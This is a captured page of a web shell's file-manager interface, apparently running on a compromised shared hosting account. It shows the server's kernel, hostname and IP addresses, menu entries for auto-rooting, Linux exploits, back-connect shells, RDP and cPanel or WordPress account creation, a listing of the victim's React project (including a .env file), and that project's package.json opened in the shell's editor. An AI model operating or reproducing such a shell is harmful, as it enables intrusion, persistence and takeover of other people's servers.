Linux server292.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 162.0.235.5 | : 216.73.216.33
Cant Read [ /etc/named.conf ]
8.3.25
comfsblg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
comfsblg /
jobspot /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
a54cc4
[ DIR ]
drwxr-xr-x
cccb3
[ DIR ]
dr-xr-xr-x
dist
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
.env
873
B
-rw-r--r--
.eslintignore
22
B
-rw-r--r--
.eslintrc.cjs
436
B
-rw-r--r--
.gitattributes
66
B
-rw-r--r--
.gitignore
241
B
-rw-r--r--
.htaccess
1.13
KB
-r-xr-xr-x
BUILD_SUMMARY.md
7.75
KB
-rw-r--r--
EIGHT_LEARNING_IMPLEMENTATION_...
8.91
KB
-rw-r--r--
LOGIN_AUTHENTICATION_FIX_COMPL...
4.37
KB
-rw-r--r--
README.md
1.23
KB
-rw-r--r--
SERVICE_MARKETPLACE_IMPLEMENTA...
7.99
KB
-rw-r--r--
important-commands.txt
46
B
-rw-r--r--
package-lock.json
449.83
KB
-rw-r--r--
package.json
2.68
KB
-rw-r--r--
robots.txt
357
B
-rw-r--r--
tsconfig.json
607
B
-rw-r--r--
tsconfig.node.json
213
B
-rw-r--r--
vite.config.ts
229
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "demo1", "private": true, "version": "8.2.9", "type": "module", "scripts": { "dev": "vite", "build": "tsc && vite build", "lint": "eslint . --ext ts,tsx --report-unused-disable-directives --max-warnings 0", "preview": "vite preview" }, "dependencies": { "@formatjs/intl-pluralrules": "5.2.14", "@formatjs/intl-relativetimeformat": "11.2.14", "@fortawesome/fontawesome-free": "6.6.0", "@popperjs/core": "^2.11.8", "@tanstack/react-query": "^5.59.20", "@tanstack/react-query-devtools": "^5.59.20", "@tanstack/react-table": "^8.20.5", "animate.css": "4.1.1", "apexcharts": "3.51.0", "axios": "^1.7.9", "bootstrap": "^5.3.3", "bootstrap-icons": "^1.11.3", "chart.js": "^4.4.3", "clsx": "2.1.1", "formik": "2.4.6", "html-react-parser": "^5.2.2", "line-awesome": "1.3.0", "motion": "^12.0.3", "nouislider": "15.8.1", "prism-react-renderer": "2.3.1", "prism-themes": "1.9.0", "prismjs": "1.29.0", "qs": "6.12.3", "react": "^18.3.1", "react-apexcharts": "1.4.1", "react-bootstrap": "^2.10.9", "react-chartjs-2": "^5.3.0", "react-copy-to-clipboard": "5.1.0", "react-datepicker": "^7.6.0", "react-dom": "^18.3.1", "react-dropzone": "^14.3.5", "react-flatpickr": "^3.10.13", "react-icons": "^5.4.0", "react-inlinesvg": "4.1.3", "react-intl": "^6.6.8", "react-loading-skeleton": "^3.5.0", "react-quill": "^2.0.0", "react-router-dom": "6.25.1", "react-select": "^5.10.0", "react-share": "^5.2.2", "react-to-print": "^3.0.5", "react-toastify": "^11.0.2", "react-topbar-progress-indicator": "4.1.1", "recharts": "^2.15.1", "socicon": "3.0.5", "yup": "^1.4.0" }, "devDependencies": { "@types/bootstrap": "5.2.10", "@types/chart.js": "2.9.41", "@types/jest": "29.5.12", "@types/node": "22.0.0", "@types/prismjs": "1.26.4", "@types/qs": "6.9.15", "@types/react": "18.3.3", "@types/react-copy-to-clipboard": "5.0.7", "@types/react-dom": "^18.3.0", "@types/sass-loader": "8.0.8", "@typescript-eslint/eslint-plugin": "^7.18.0", "@typescript-eslint/parser": "^7.18.0", "@vitejs/plugin-react-swc": "^3.7.0", "css-loader": "7.1.2", "del": "7.1.0", "eslint": "^8.45.0", "eslint-plugin-react-hooks": "^4.6.2", "eslint-plugin-react-refresh": "^0.4.9", "mini-css-extract-plugin": "2.9.0", "remove-files-webpack-plugin": "^1.5.0", "rtlcss-webpack-plugin": "4.0.7", "sass": "1.77.6", "sass-loader": "16.0.0", "typescript": "^5.5.4", "vite": "^5.3.5", "webpack": "^5.97.1", "webpack-cli": "5.1.4", "webpack-rtl-plugin": "^1.3.0" } }
Close